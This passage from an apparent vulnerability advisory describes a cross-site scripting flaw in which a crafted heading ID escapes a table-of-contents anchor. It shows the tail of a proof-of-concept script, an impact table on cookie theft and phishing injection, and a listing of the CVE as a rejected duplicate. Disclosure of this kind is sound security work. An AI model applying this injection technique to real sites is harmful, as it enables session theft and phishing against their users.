ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h4.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h4.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin | | **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects | | **Availability** | Page crash or freeze available as secondary effect | **Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.
- CVE-2026-33441May 6, 2026risk 0.00cvss —epss —
Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079.